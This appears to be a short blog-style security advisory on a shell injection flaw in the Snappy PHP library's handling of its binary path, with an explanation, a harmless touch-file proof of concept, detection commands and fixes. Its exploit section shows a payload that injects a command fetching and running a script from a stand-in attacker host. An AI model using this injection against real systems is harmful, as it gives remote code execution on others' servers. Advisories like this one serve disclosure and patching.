Listen to this Post
How the CVE works:
The vulnerable code attempts to shell-escape the binary path with `escapeshellarg(‘/usr/bin/wkhtmltopdf’)` before checking is_executable(). On POSIX, this adds literal single quotes around the path, so `is_executable()` looks for a file named `‘/usr/bin/wkhtmltopdf’` (including the quotes), which never exists. The safe branch is therefore dead code, and the command falls through to the raw, unescaped value. Since the rest of the command arguments are escaped correctly, an attacker can only inject into the binary string. If that path is influenced by user data (e.g., from configuration or environment variables), an attacker can inject shell metacharacters. The proof-of-concept uses `wkhtmltopdf; touch /tmp/snappy_rce` as the binary path, which creates the file `/tmp/snappy_rce` when `$pdf->generate()` is called.
DailyCVE form
Platform: PHP library
Version: <1.7.1
Vulnerability: Shell injection
Severity: High
Date: 2026-05-15
Prediction: Patch within 10 days
What Undercode Say:
Analytics: The flaw stems from a classic logic inversion: a security check is applied after escaping, rendering it meaningless. Any user-controlled binary path defeats the `escapeshellarg` wrapper.
Bash commands and codes related to the blog
Test if your current version is vulnerable
composer show knplabs/snappy | grep versions
Quick PoC (requires PHP with exec permissions)
php -r '$pdf = new Knp\Snappy\Pdf("wkhtmltopdf; touch /tmp/rce"); $pdf->generate("https://example.com", "/tmp/out.pdf");'
ls -la /tmp/rce
Check your own code for unsafe patterns
grep -r "new Knp\Snappy\Pdf.\$(.)" src/
Exploit:
An attacker supplies a binary path containing shell metacharacters, for instance:
`wkhtmltopdf; curl http://attacker.com/shell.sh | bash`
If the application unsafely passes this path to the `Pdf` constructor, the shell command is executed when `generate()` is called. The escaping of the rest of the command does not block this injection.
Protection from this CVE
- Immediate: Validate the binary path with `is_executable()` before constructing the `Pdf` object.
- Permanent: Upgrade to Snappy ≥ 1.7.1 as soon as it is available.
Impact
Remote code execution (RCE) under the PHP process user. If the binary path can be influenced by an attacker (e.g., via environment variables, configuration, or concatenated user input), the attacker can run arbitrary system commands. Even when the path is hard-coded, the vulnerability breaks defensive-in-depth expectations of downstream packages.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

